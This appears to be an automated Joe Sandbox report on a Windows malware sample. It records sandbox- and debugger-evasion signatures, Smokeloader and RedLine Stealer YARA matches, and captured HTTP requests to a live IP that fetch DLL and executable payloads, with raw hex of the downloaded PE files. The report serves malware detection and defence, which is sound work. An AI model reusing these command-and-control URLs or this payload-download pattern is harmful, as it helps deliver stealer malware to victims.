Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BEd2lJRXFM.exe

Overview

General Information

Sample name:	BEd2lJRXFM.exe renamed because original name is a hash value
Original sample name:	1f39fac8d8f8c1e3e0697ebf585af36c.exe
Analysis ID:	1578885
MD5:	1f39fac8d8f8c1e3e0697ebf585af36c
SHA1:	f98243a6bdea8f7de4cfa02d157e94b1cf925f51
SHA256:	ec2349f4f55242a8328a7f11c5013a7525fa05aa18a680c1d82f2d6d93e6e1ad
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

×

Process Tree

System is w10x64

BEd2lJRXFM.exe (PID: 5664 cmdline: "C:\Users\user\Desktop\BEd2lJRXFM.exe" MD5: 1F39FAC8D8F8C1E3E0697EBF585AF36C)

WerFault.exe (PID: 648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 492 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x13c0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BEd2lJRXFM.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: BEd2lJRXFM.exe	Virustotal: Detection: 48%			Perma Link
Source: BEd2lJRXFM.exe	ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BEd2lJRXFM.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,		0_2_004034C0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B53727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,		0_2_04B53727

Source: BEd2lJRXFM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:13:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:13:31 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache

Source: BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.7
Source: BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2051007227.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000002.2663026428.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076057799.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empf
Source: BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2051007227.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076057799.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emppN
Source: BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/download
Source: BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/downloadB
Source: BEd2lJRXFM.exe, 00000000.00000002.2663026428.00000000055D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/key
Source: BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download-
